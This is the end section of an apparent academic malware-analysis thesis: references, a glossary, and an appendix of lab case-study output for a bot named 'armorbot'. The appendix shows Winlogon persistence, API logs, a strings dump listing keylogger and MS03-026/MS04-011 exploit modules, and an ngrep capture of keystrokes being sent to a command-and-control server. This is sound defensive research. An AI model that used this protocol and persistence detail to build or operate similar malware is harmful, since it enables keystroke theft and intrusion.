http://technet.microsoft.com/en-us/sysinternals/bb897445
Microsoft. (2010, 12 14). Vectored Exception Handling. Retrieved 01 03, 2011, from
http://msdn.microsoft.com: http://msdn.microsoft.com/en-us/library/ms681420(VS.85).aspx
Microsoft. (2011). Windows Virtual PC. Retrieved 01 30, 2011, from http://www.microsoft.com:
http://www.microsoft.com/windows/virtual-pc/
Mushtaq, A. (2011, 01 27). The Dead Giveaways of VM-Aware Malware . Retrieved 01 31, 2011, from
http://blog.fireeye.com: http://blog.fireeye.com/research/2011/01/the-dead-giveaways-of-vm-aware-
malware.html
74
National Institute of Standards and Technology (NIST). (2008). Computer Security Incident Handling
Guide (SP800-61rev1). Gaithersburg, MD: U.S. Department of Commerce.
National Institute of Standards and Technology (NIST). (2005). Guide to Malware Incident Prevention and
Handling (SP800-83). Gaithersburg. MD: U.S. Department of Commerce.
Nektra Advanced Computing. (2009). SpyStudio Overview. Retrieved 01 30, 2011, from
http://www.nektra.com: http://www.nektra.com/products/spystudio-api-monitor/
Oreans Technologies. (2008, 12 22). codevirtualizer.php. Retrieved 12 17, 2010, from
http://www.oreans.com: http://www.oreans.com/codevirtualizer.php
Orr. (2006, 11). The Viral Darwinism of W32.Evol: An In-depth Analysis of a Metamorphic Engine.
Retrieved 1 12, 2011, from http://www.antilife.org: http://www.antilife.org/files/Evol.pdf
PC Magazine. (2000, 12 05). InCtrl5: Download It Here. Retrieved 01 11, 2011, from
http://www.pcmag.com: http://www.pcmag.com/article2/0,2817,25126,00.asp
Perrin, C. (2008, 12 18). Understanding layered security and defense in depth. Retrieved 02 01, 2011,
from http://www.techrepublic.com: http://www.techrepublic.com/blog/security/understanding-
layered-security-and-defense-in-depth/703?tag=rbxccnbtr1
Pietrek, M. (1994, 03). Peering Inside the PE: A Tour of the Win32 Portable Executable File Format.
Retrieved 01 05, 2010, from http://www.skynet.ie:
http://www.skynet.ie/~caolan/pub/winresdump/winresdump/doc/msdn_peeringpe.html
Praxiom Research Group Ltd. (2009, 12 08). ISO 27001 AND ISO 27002 PLAIN ENGLISH INFORMATION
SECURITY MANAGEMENT DEFINITIONS. Retrieved 01 15, 2011, from http://www.praxiom.com:
http://www.praxiom.com/iso-27001-definitions.htm#Policy
Quist, D., & Valsmith. (2007, August 1). Covert Debugging: Circumventing Software Armoring
Techniques. Retrieved October 1, 2010, from http://www.offensivecomputing.net:
http://www.offensivecomputing.net/bhusa2007/dquist-valsmith-covert-debugging-presentation.pdf
Ritter, J. (2006, 11 18). ngrep - network grep. Retrieved 01 30, 2011, from http://ngrep.sourceforge.net/:
http://ngrep.sourceforge.net/
Russinovich, M. (2009, 03 02). Strings v2.41. Retrieved 01 11, 2011, from http://technet.microsoft.com:
http://technet.microsoft.com/en-us/sysinternals/bb897439
Russinovich, M. (2011, 01 25). Sysinternals Suite. Retrieved 01 30, 2011, from
http://technet.microsoft.com: http://technet.microsoft.com/en-us/sysinternals/bb842062
Rutkowska, J. (2004, November). Red Pill... or how to detect VMM using (almost) one. Retrieved 10 31,
2010, from http://www.invisiblethings.org: http://www.invisiblethings.org/papers/redpill.html
75
SANS, t. I. (2006). Incident Handling Step-by-Step and Computer Crime Investigation. Security 504 -
Hacker Techniques, Exploits, & Incident Handling (p. 283). The SANS Institute.
Scambray, J., & McClure, S. (2008). Hacking Windows Exposed: Windows Security Secrets and Solutions,
3rd Edition. New York: McGraw Hill.
Schiller, C., Binkley, J., Harley, D., Evron, G., Bradley, T., Willems, C., et al. (2007). Botnets: The Killer Web
App. Brlington, MA: Syngress Publishing Inc.
Sherstobitoff, R. (2008, 05). Server-Side Polymorphism: Crime-Ware as a Service Model (CaaS). Retrieved
01 13, 2011, from http://pandasecurityus.files.wordpress.com:
http://pandasecurityus.files.wordpress.com/2008/05/server-side-polymorphism.pdf
Skoudis, E. (2004). Malware: Fighting Malicious Code. Upper Saddle River, NJ: Prentice Hall PTR.
Spengler, B. (2011). grsecurity. Retrieved 02 01, 2011, from http://grsecurity.net/: http://grsecurity.net/
Street, J. E., & Nabors, K. (2010). Dissecting the Hack: The F0rb1dd3n Network. Amsterdam, Holland:
Elsevier.
Swanson, W. (2003). The Art of Picking Intel Registers. Retrieved 01 11, 2011, from
http://www.swansontec.com: http://www.swansontec.com/sregisters.html
Szor, P. (2005). The Art of Computer Virus Research and Defense. Upper Saddle River, NJ: Addison
Wesley Professional.
the PaX team. (n.d.). Documentation for the PaX project. Retrieved 02 01, 2011, from
http://pax.grsecurity.ne: http://pax.grsecurity.net/docs/
US Army. (2010, 04 23). Information Assurance Fundamentals (IAF) Training. Lesson 6. Retrieved 01 15,
2011, from https://ia.signal.army.mil: https://ia.signal.army.mil/IAF/IASOLesson6.asp
Veracode. (2008, 03 13). Anti-Debugging: A Developers Viewpoint. Retrieved 01 03, 2011, from
http://www.donkeyonawaffle.org: http://www.donkeyonawaffle.org/misc/Source_Boston_2009-
Antidebugging-Dev-Release.pdf
VMware Inc. (2011). VMware. Retrieved 01 30, 2011, from http://www.vmware.com:
http://www.vmware.com/
Volatile Systems, LLC . (2008). The Volatility Framework: Volatile memory artifact extraction utility
framework. Retrieved 01 30, 2011, from https://www.volatilesystems.com:
https://www.volatilesystems.com/default/volatility
Walenstein, A., Mathur, R., Chouchane, M. R., & Lakhoti, A. (2007). The Design Space of Metamorphic
Malware. Lafayette, LA. (USA): http://www.cacs.louisiana.edu/labs/SRL/publications/2007-iciw-
walenstein-mathur-chouchane-lakhotia.pdf.
76
Websense. (n.d.). Win32 Portable Executable Packing Uncovered. Retrieved 01 05, 2010, from
http://www.woodmann.com:
http://www.woodmann.com/collaborative/knowledge/images/Bin_Win32_Portable_Executable_Packin
g_Uncovered_2010-2-6_16.27_HistoryofPackingTechnology.pdf
West-Brown, M. J., Stikvoort, D., Kossakowski, K.-P., Killcrece, G., Ruefle, R., & Zajicek, M. (2003, April 1).
http://www.cert.org/archive/pdf/csirt-handbook.pdf. Retrieved 12 07, 2010, from
http://www.cert.org/csirts/csirt_faq.html: http://www.cert.org/csirts/csirt_faq.html
Wismer, K. (2007, 08 10). What is server-side polymorphism? Retrieved 01 13, 2011, from http://anti-
virus-rants.blogspot.com: http://anti-virus-rants.blogspot.com/2007/08/what-is-server-side-
polymorphism.html
Xen.org. (2011). What is xen? Retrieved 01 30, 2011, from http://www.xen.org/: http://www.xen.org/
xinfiltrate. (n.d.). Vb6 Crypter Sources. Retrieved 01 15, 2011, from http://crypters.net:
http://crypters.net/sources.html
y0da. (2009, 09 30). LordPE . Retrieved 01 30, 2011, from http://www.woodmann.com:
http://www.woodmann.com/collaborative/tools/index.php/LordPE
Yuschuk, O. (2010, 11 20). Ollydbg. Retrieved 01 30, 2011, from http://www.ollydbg.de/:
http://www.ollydbg.de/
Zeltser, L. (2010, 10 11). 3 Phases of Malware Analysis: Behavioral, Code, and Memory Forensics.
Retrieved 10 23, 2010, from http://blogs.sans.org: http://blogs.sans.org/computer-
forensics/2010/10/11/3-phases-malware-analysis-behavioral-code-memory-forensics/
Zeltser, L. (2011, 01). 4 Steps to Combat Malware Enterprisewide. Retrieved 02 01, 2011, from
http://campustechnology.imirus.com:
http://campustechnology.imirus.com/Mpowered/book/vcampus11/i1/p50
Zhang, J. (2010). Improved Software Activation Using Multithreading. San Jose: San José State University.
77
Appendix A – Glossary
ASCII: or American Standard Code for Information Interchange, is a method for encoding data
into computer and network compatible format.
Command and Control Server: A server located on a public network that receives communication from
infected hosts and returns commands back to the infected systems.
C&C Server: see Command and Control Server
Crypter: A program designed to add runtime encryption to an executable file.
Exfiltrate: Removal data from within a trusted environment.
Honey Pot: A system connected to a network that is designed to draw attention from hackers, in a
hope of collecting data about malicious activities.
ImageBase: Address where the PE image will be mapped in memory (unless there is a relocation).
Import Address Table (IAT): This is the table of libraries, containing required functions, that an
executable must have available at runtime.
Original Entry Point (OEP): The address of the executable once it is loaded into memory. This
address can be updated based on modifying sections. The program begins it execution
at this location.
Obfuscate: To encode or otherwise hide information within seemingly random data patterns.
Promiscuous Mode: A function of a Network Interface Card (NIC) whereby it can listen and accept
packets not only destined for itself.
Registry: The set of files in a Microsoft Windows system that hold the configuration and system
settings
RFC: or Request For Comment, typically a document that describes a networking protocol or
technology. These descriptions are generally accepted by all as the de facto definition
of the thing being described.
Relative Virtual Address (RVA): This is an address relative to the ImageBase. It is like an offset relative to
the ImageBase. It is not a file offsets, which is relative to the start of the file on disk.
Trojan Horse Program: A computer executable that looks legitimate but carries some type of malicious
payload.
78
Appendix B – Case study findings
From investigation of malware that is known not to be armored
Installation Report: _imbi Generated by InCtrl5, version 1.0.0.0
Install program: C:\Documents and Settings\steve\Desktop\_imbi.exe
10/8/2010 3:57 PM
Contents
Registry
Disk Contents
Ini Files
Text Files
Registry
Keys ignored: 0
(none)
Values changed: 1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Userinit"
Old type: REG_SZ New type: REG_SZ Old data: C:\WINDOWS\system32\userinit.exe, New data: (data too large: 513 bytes)
To Contents
Disk contents
Drives tracked: 1
c:\
79
Files added: 3 c:\WINDOWS\Prefetch\_IMBI.EXE-0C63A1AA.pf
Date: 10/8/2010 3:57 PM Size: 9,180 bytes
c:\WINDOWS\Prefetch\_JEDZ.EXE-1CE1D328.pf Date: 10/8/2010 3:57 PM Size: 8,452 bytes
c:\WINDOWS\system32\_jedz.exe Date: 10/8/2010 3:56 PM Size: 77,824 bytes
Files changed: 2 c:\WINDOWS\system32\config\software
Old date: 10/8/2010 3:39 PM New date: 10/8/2010 3:57 PM Old size: 8,388,608 bytes New size: 8,388,608 bytes
c:\WINDOWS\system32\config\software.LOG Old date: 10/8/2010 3:57 PM New date: 10/8/2010 3:57 PM Old size: 20,480 bytes New size: 1,024 bytes
To Contents
INI file
Ini files tracked: 4
C:\boot.ini
c:\windows\control.ini
c:\windows\system.ini
c:\windows\win.ini
To Contents
Text file
Text files tracked: 2
c:\windows\system32\autoexec.nt
c:\windows\system32\config.nt
To Contents
InCtrl5, Copyright © 2000 by Ziff Davis Media, Inc.
Written by Neil J. Rubenking
First published in PC Magazine, December 5, 2000.
Figure 44 – Full output of Inctrl5
80
Processes:
PID ParentPID User Path
--------------------------------------------------
500 2012 WXPSP0:steve C:\WINDOWS\System32\_hohn.exe
Ports:
Port PID Type Path
--------------------------------------------------
Explorer Dlls:
DLL Path Company Name File Description
--------------------------------------------------
No changes Found
IE Dlls:
DLL Path Company Name File Description
--------------------------------------------------
No changes Found
Loaded Drivers:
Driver File Company Name Description
--------------------------------------------------
Monitored RegKeys
Registry Key Value
--------------------------------------------------
Kernel31 Api Log
--------------------------------------------------
***** Installing Hooks *****
71ab4401 RegOpenKeyExA
(HKLM\System\CurrentControlSet\Services\WinSock2\Parameters)
71ab4c59 RegOpenKeyExA (Protocol_Catalog9)
71ab457f RegOpenKeyExA (00000004)
71ab4650 RegOpenKeyExA (Catalog_Entries)
71ab4952 RegOpenKeyExA (000000000001)
71ab4952 RegOpenKeyExA (000000000002)
71ab4952 RegOpenKeyExA (000000000003)
71ab4952 RegOpenKeyExA (000000000004)
71ab4952 RegOpenKeyExA (000000000005)
71ab4952 RegOpenKeyExA (000000000006)
71ab4952 RegOpenKeyExA (000000000007)
71ab4952 RegOpenKeyExA (000000000008)
71ab4952 RegOpenKeyExA (000000000009)
71ab4952 RegOpenKeyExA (000000000010)
71ab4952 RegOpenKeyExA (000000000011)
71ab1779 WaitForSingleObject(7a8,0)
71ab4e6d RegOpenKeyExA (NameSpace_Catalog5)
71ab4797 RegOpenKeyExA (Catalog_Entries)
71ab4efa RegOpenKeyExA (000000000001)
71ab4efa RegOpenKeyExA (000000000002)
71ab4efa RegOpenKeyExA (000000000003)
71ab1779 WaitForSingleObject(7a0,0)
71aa16bd RegOpenKeyExA
(HKLM\System\CurrentControlSet\Services\Winsock2\Parameters)
71aa157c GlobalAlloc()
77e802f3 ExitThread()
4083ad GetVersionExA()
405eda GetCommandLineA()
402c64 CreateMutex(0x3)
401d38 RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\WinLogon)
401e2a Copy(C:\Documents and Settings\steve\Desktop\_imbi.exe-
>C:\WINDOWS\System32\_hohn.exe)
77e6bc59 WriteFile(h=790)
401ef0 RegCreateKeyExA (HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\WinLogon,(null))
401f14 RegSetValueExA (Userinit)
401f70 CreateProcessA((null),C:\WINDOWS\System32\_hohn.exe,0,(null))
77e7d0b7 WaitForSingleObject(78c,64)
81
10001e25 LoadLibraryA(psapi.dll)=76bf0000
10001e66 GetCurrentProcessId()=2012
76bf1720 ReadProcessMemory(h=790)
76bf173f ReadProcessMemory(h=790)
76bf175d ReadProcessMemory(h=790)
76bf16af ReadProcessMemory(h=790)
***** Injecting C:\iDEFENSE\SysAnalyzer\api_log.dll into new process
***** OpenProcess Handle=790
***** Remote Allocation base: 140000
***** WriteProcessMemory=1 BufLen=23 BytesWritten:23
***** LoadLibraryA=77e805d8
***** CreateRemoteThread=794
401f89 ExitProcess()
***** Injected Process Terminated *****
71ab1779 WaitForSingleObject(5c,0)
71ab1779 WaitForSingleObject(64,0)
402cbd LoadLibraryA(kernel32.dll)=77e60000
77ddad96 LoadLibraryA(Secur32.dll)=76f90000
4053b4 GetSystemTime()
401019 socket(family=2,type=1,proto=0)
71ab52c6 LoadLibraryA(C:\WINDOWS\system32\mswsock.dll)=71a50000
71a5716a LoadLibraryA(C:\WINDOWS\system32\mswsock.dll)=71a50000
71aa14eb GlobalAlloc()
4010ad connect( 172.16.5.180:80 )
402e40 send(h=84)
402f4d recv(h=84)
402f6d closesocket(84)
DirwatchData
--------------------------------------------------
WatchDir Initilized OK
Watching C:\DOCUME~1\steve\LOCALS~1\Temp
Watching C:\WINDOWS
Watching C:\Program Files
Created: C:\WINDOWS\system32\_hohn.exe
Modifed: C:\WINDOWS\system32\_hohn.exe
Modifed: C:\WINDOWS\system32
Modifed: C:\WINDOWS\Prefetch
Created: C:\WINDOWS\Prefetch\_IMBI.EXE-0C63A1AA.pf
Modifed: C:\WINDOWS\Prefetch\_IMBI.EXE-0C63A1AA.pf
Created: C:\DOCUME~1\steve\LOCALS~1\Temp\JETDB44.tmp
Created: C:\DOCUME~1\steve\LOCALS~1\Temp\JET3.tmp
Deteled: C:\DOCUME~1\steve\LOCALS~1\Temp\JET3.tmp
Modifed: C:\WINDOWS\system32\config\SECURITY.LOG
Deteled: C:\DOCUME~1\steve\LOCALS~1\Temp\JETDB44.tmp
File: _hohn.exe
Size: 77824 Bytes
MD5: A53B7B732C2F3189B5F4BBE31C459EB9
Packer: File not found C:\iDEFENSE\SysAnalyzer\peid.exe
File Properties: CompanyName
FileDescription
FileVersion
InternalName
LegalCopyright
OriginalFilename
ProductName
ProductVersion
Exploit Signatures:
---------------------------------------------------------------------------
Scanning for 19 signatures
*** Found: RPC DCOM Exploit MS03-026
*** Found: Microsoft Workstation Vulnurability
*** Found: LSASS exploit - MS04-011
Scan Complete: 80Kb in 0.015 seconds
Urls
--------------------------------------------------
82
RegKeys
--------------------------------------------------
SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon
ExeRefs
--------------------------------------------------
File: _hohn_dmp.exe_
C:\WINDOWS\system32\userinit.exe
.exe
C:\WINDOWS\System32\_hohn.exe
Raw Strings:
--------------------------------------------------
File: _hohn_dmp.exe_
MD5: 82c454488ec8bcd138b7b881523b73c0
Size: 81922
Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
RichRW .text `.rdata
@.data jhhH j|h`
Ph~f hXMV hXMV
YYh( SUVW _^][
GIt# t&:a tzVS
GIt% t/Ku ^[_3
^_[] SVWUj ]_^[
t.;t$$t( VC20XC00U SVWU
tEVU t3x< ]_^[
XSVW _WPS HHtpHHtl
RPWV ^_[3 Vt6P
SUVW _^][ ~&WP
SVW3 X_[^ QQSV
btHHt. SUV3 _^][
YYj0[ <]t_G<-uA ]t6G:
YY9u >%uM <"u%
F<"t t9UW ?=t"U
QQS3 PSSW 8"uD
8"uF@ 8"u, @@f9
@@f9 SS@SSPVSS t#SSUP
t$$VSS _^][YY DSUVWh
_^][ 8MZu t>j,P
Yt0@ ^VhD PVh@
VWss Yu!j 5$*A
QSUVW3 -8)A h@)A
<f9- PUj? ShD)A
5$*A PUj? 5$*A
>:uNFV >:u#FV _^][Y
SVW3 9=8)A Qf9=
WQPWS ,f9= WWWj
WWSj WWWj %t,A
%x,A uiSj =l,A
uY;] pD#U j #M
j?^; %t,A 5|,A
X_^[ SUVWu _^][
950%A QQSV 50%A
6;50%A 50%A =0%A
sN;E u%C@ 5,*A
Yt4^ ^;54%A t-Ht!Ht
5t.; ~*9E 5$*A
5$*A Y;5@*A 90tr
5@*A Wj@Y3 5@*A
t7SW 5d,A
5@*A 5@*A 5d,A
5@*A 5d,A @AA;
u,9E VWuBh ;54%A
u?Vj =,*A <8=u
@}>j 9=8*A uFWWj
[ShD "WWSh@ 9} u
E WW tMWWS t@9}
VSh 5@*A 5d,A
83
QSUV WWWWj t/WWUPj
_^][Y 0SVW _u@W
PWPSS =<*A PWPSS
9] u tySS t-VW
QQSVW3 tUj= t@9u
uT9} 8<=t ^][_
SVWu =,*A ;54%A
=,*A =,*A =\*A
vPG!v vMN v (8PX
700WP `h```` ppxxxx
(null)
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error
TLOSS error
SING error
DOMAIN error
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
abnormal program termination
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program:
<program name unknown>
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
IsDebuggerPresent
CloseHandle
WriteFile
CreateFileA
ExitProcess
CreateProcessA
Sleep
CopyFileA
GetSystemDirectoryA
GetModuleFileNameA
GetModuleHandleA
TerminateThread
CreateThread
GetLocalTime
TerminateProcess
OpenProcess
Process32Next
Process32First
CreateToolhelp32Snapshot
GetProcAddress
84
LoadLibraryA
GetLastError
CreateMutexA
GetTickCount
GetVersionExA
GetComputerNameA
GetSystemInfo
KERNEL32.dll
GetAsyncKeyState
GetKeyState
GetWindowTextA
GetForegroundWindow
USER32.dll
GetUserNameA
RegCloseKey
RegSetValueExA
RegCreateKeyExA
RegQueryValueExA
RegOpenKeyExA
ADVAPI32.dll
InternetCloseHandle
InternetReadFile
InternetOpenUrlA
InternetOpenA
WININET.dll
WS2_32.dll
GetCurrentProcess
GetTimeZoneInformation
GetSystemTime
RtlUnwind
GetStartupInfoA
GetCommandLineA
GetVersion
HeapFree
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetEnvironmentVariableA
HeapDestroy
HeapCreate
VirtualFree
MultiByteToWideChar
GetStringTypeA
GetStringTypeW
SetFilePointer
HeapAlloc
VirtualAlloc
HeapReAlloc
SetStdHandle
FlushFileBuffers
ReadFile
GetCPInfo
GetACP
GetOEMCP
SetEndOfFile
LCMapStringA
LCMapStringW
CompareStringA
CompareStringW
SetEnvironmentVariableA
%02x%02x
%s%s
%s\_%s%s
%s%s,
%s%s|%d|OK
85
[EC] [EC] [F1]
[F1] [F2] [F2]
[F3] [F3] [F4]
[F4] [F5] [F5]
[F6] [F6] [F7]
[F7] [F8] [F8]
[F9] [F9] [10]
[10] [11] [11]
[12] [12] [TB]
[TB] [CL] [CL]
[WN] [WN] [WN]
[WN] [PS] [PS]
[SL] [SL] [IN]
[IN] [HM] [HM]
[PP] [PP] [DL]
[DL] [EN] [EN]
[PD] [PD] [LF]
[LF] [UP] [UP]
[RT] [RT] [DN]
[DN] [NL] [NL]
[%d-%d-%d %d:%d:%d] %s
%s%s%s)
%s%s(%s)
%s%s%s)
%s%s|%d|%d%s
%s%s|%d|%d%s
%d+-+%s\
%s%s|%d|%s
%s%s|%d|OK
0.0.176
armorbot
get /cgi-bin/a?a=
join
SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon
Userinit
C:\WINDOWS\system32\userinit.exe
idle
172.16.5.180
kernel32.dll
RegisterServiceProcess
SLEEPING
VERSION
KEYLOGDATA
PROCESSLIST
error+opening+
+over+port+
+OPEN+on+
Content-Length:
InetURL/1.0
keyLogger+already+started
keyLogger+failed+to+start+thread
keyLogger+started
keyLogger+turned+off
keylogger.dat
(Changed Windows:
(Buffer full)
(Return) (
_killed|
_not_killed|
.exe
failed
OS:98,IP:
OS:ME,IP:
OS:2000,IP:
OS:XP,Processor:
OS:version:
_SYSNAME:_
,Processor:
OS: 95
OS: NT
ipc$
86
version
processes
kill
scan
keylog
update
ms03_026
ms04_011
sleep
upload
Host:
SCANDATA
%s%s|%d|%s|
%s%s|%d|%s|
%s%s|%d|
MARB
MEOW
MEOW(
MEOW
~'?bB
41Qk
2{d_
WvWy
l4u`3
YZqvgff
SMBr
PC NETWORK PROGRAM 1.0
LANMAN1.0
Windows for Workgrou
ps 3.1a
LM1.2X002
LANMAN2.1
NT LM 0.12
SMBs
NTLMSSP
SMBs
NTLMSSP
SMBu
?????
SMB%
SMB%
SMB/
SMB%
\\%s\%s
%d.%d.%d.%d
%s%s%s%d
%s%s|%d|%s
%s%d%s%s
%s%s|%d|%s
%s%s|%d|OK
%s%s%s%d
%s%s|%d|%s
%s%d%s%s
%s%s|%d|%s
%s%s|%d|OK
%s%s%s%d
%s%s|%d|%s
%s%d%s%s
%s%s|%d|%s
%s%s|%d|OK
%s%s|%d|%d
%s%d.%d.%d.%d
%s%d.%d.%d.%d
%s%d.%d.%d.%d
%s%u:%d.%d.%d.%d%s%s
%s%d.%d%s%u:%d.%d.%d.%d%s%s
%s\_%s%s
%s,%s
%s%s|%d|%s
%s%s|%d|%s_%s|%s
Pacific Standard Time
87
Pacific Daylight Time
C:\WINDOWS\System32\_hohn.exe
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
Unicode Strings:
---------------------------------------------------------------------------
jjjj
jjjj
(null)
\\\C$\123456111111111111111.doc
FXNBFXFXNBFXFXFXFX
Windows 2000 2195
Windows 2000 5.0
Windows 2000 2195
Windows 2000 5.0
\\192.168.1.210\IPC$
\lsarpc
\PIPE\
\PIPE\
\PIPE\
((((( H
Pacific Standard Time
Pacific Daylight Time
Figure 45 – Full output of SysAnalyzer
Script started on Tue Jan 25 15:08:58 2011
sh-3.2# pwd
/opt/local/bin
sh-3.2# ./b ngrep -d en1 port 80
interface: en1 (192.168.0.0/255.255.255.0)
filter: (ip) and ( port 80 )
###
T 192.168.0.125:1069 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1069 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=join|843|steve|..
##
T 172.16.5.180:80 -> 192.168.0.125:1069 [AP]
<html>|ack|843|</html>
##
T 192.168.0.125:1069 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1069 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1070 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1070 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=idle|843|..
##
T 172.16.5.180:80 -> 192.168.0.125:1070 [AP]
<html>|version|843|</html>
##
T 192.168.0.125:1070 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1070 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1071 -> 172.16.5.180:80 [A]
FHEPF
#
88
T 192.168.0.125:1071 -> 172.16.5.180:80 [AF]
FHEPF
###
T 192.168.0.125:1071 -> 172.16.5.180:80 [A]
FHEPF
##
T 192.168.0.125:1072 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1072 -> 172.16.5.180:80 [AP]
get /cgi-
bin/a?a=VERSION|843|armorbot_0.0.156|OS:version:586:192.168.0.125_
SYSNAME:_WXPSP0...
#
T 192.168.0.125:1072 -> 172.16.5.180:80 [AF]
......
##
T 172.16.5.180:80 -> 192.168.0.125:1072 [AP]
<html>|ack|843|</html>
#
T 192.168.0.125:1072 -> 172.16.5.180:80 [R]
get /c
##
T 192.168.0.125:1072 -> 172.16.5.180:80 [R]
......
###
T 192.168.0.125:1073 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1073 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=idle|843|..
##
T 172.16.5.180:80 -> 192.168.0.125:1073 [AP]
<html>|keylog|843|on|</html>
##
T 192.168.0.125:1073 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1073 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1074 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1074 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=KEYLOGDATA|843|OK..
#
T 192.168.0.125:1074 -> 172.16.5.180:80 [AF]
......
##
T 172.16.5.180:80 -> 192.168.0.125:1074 [AP]
<html>|ack|843|</html>
#
T 192.168.0.125:1074 -> 172.16.5.180:80 [R]
......
##
T 192.168.0.125:1074 -> 172.16.5.180:80 [R]
......
###
T 192.168.0.125:1075 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1075 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=idle|843|..
##
T 172.16.5.180:80 -> 192.168.0.125:1075 [AP]
<html>|sleep|843|360|</html>
##
T 192.168.0.125:1075 -> 172.16.5.180:80 [A]
......
#
89
T 192.168.0.125:1075 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1076 -> 172.16.5.180:80 [A]
.100.0
#
T 192.168.0.125:1076 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=SLEEPING|843|360..
#
T 192.168.0.125:1076 -> 172.16.5.180:80 [AF]
CKAAA
##
T 172.16.5.180:80 -> 192.168.0.125:1076 [AP]
<html></html>
#
T 192.168.0.125:1076 -> 172.16.5.180:80 [R]
CKAAA
##
T 192.168.0.125:1076 -> 172.16.5.180:80 [R]
.....S
###
T 192.168.0.125:1077 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1077 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=idle|843|..
##
T 172.16.5.180:80 -> 192.168.0.125:1077 [AP]
<html>|keylog|843|upload|</html>
##
T 192.168.0.125:1077 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1077 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1078 -> 172.16.5.180:80 [A]
......
#
T 192.168.0.125:1078 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=KEYLOGDATA|843|[1-22-
2011+11:46:28]++(Changed+Windows:+)..
.
#
T 192.168.0.125:1078 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1079 -> 172.16.5.180:80 [A]
......
#
T 172.16.5.180:80 -> 192.168.0.125:1078 [AP]
<html>|ack|843|</html>
#
T 192.168.0.125:1078 -> 172.16.5.180:80 [R]
......
##
T 192.168.0.125:1078 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1079 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=KEYLOGDATA|843|[1-22-
2011+11:46:28]++(Changed+Windows:+C:\
WINDOWS\System32\cmd.exe)...
#
T 192.168.0.125:1079 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1080 -> 172.16.5.180:80 [A]
......
#
T 172.16.5.180:80 -> 192.168.0.125:1079 [AP]
90
<html>|ack|843|</html>
##
T 192.168.0.125:1079 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1079 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1080 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=KEYLOGDATA|843|[1-22-
2011+11:46:32]+cd+\+(Return)+(C:\WIND
OWS\System32\cmd.exe)...
#
T 192.168.0.125:1080 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1081 -> 172.16.5.180:80 [A]
......
#
T 172.16.5.180:80 -> 192.168.0.125:1080 [AP]
<html>|ack|843|</html>
##
T 192.168.0.125:1080 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1080 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1081 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=KEYLOGDATA|843|[1-22-
2011+11:46:33]+dir+(Return)+(C:\WINDO
WS\System32\cmd.exe)...
#
T 192.168.0.125:1081 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1082 -> 172.16.5.180:80 [A]
......
#
T 172.16.5.180:80 -> 192.168.0.125:1081 [AP]
<html>|ack|843|</html>
##
T 192.168.0.125:1081 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1081 -> 172.16.5.180:80 [R]
......
#
T 192.168.0.125:1082 -> 172.16.5.180:80 [AP]
get /cgi-bin/a?a=KEYLOGDATA|843|[1-22-
2011+11:46:39]++(Changed+Windows:+Sta
rt+Menu)...
#
T 192.168.0.125:1082 -> 172.16.5.180:80 [AF]
......
####
T 192.168.0.125:1083 -> 172.16.5.180:80 [A]
......
#
T 172.16.5.180:80 -> 192.168.0.125:1082 [AP]
<html>|ack|843|</html>
#
T 192.168.0.125:1082 -> 172.16.5.180:80 [R]
......
##
T 192.168.0.125:1082 -> 172.16.5.180:80 [R]
......
#
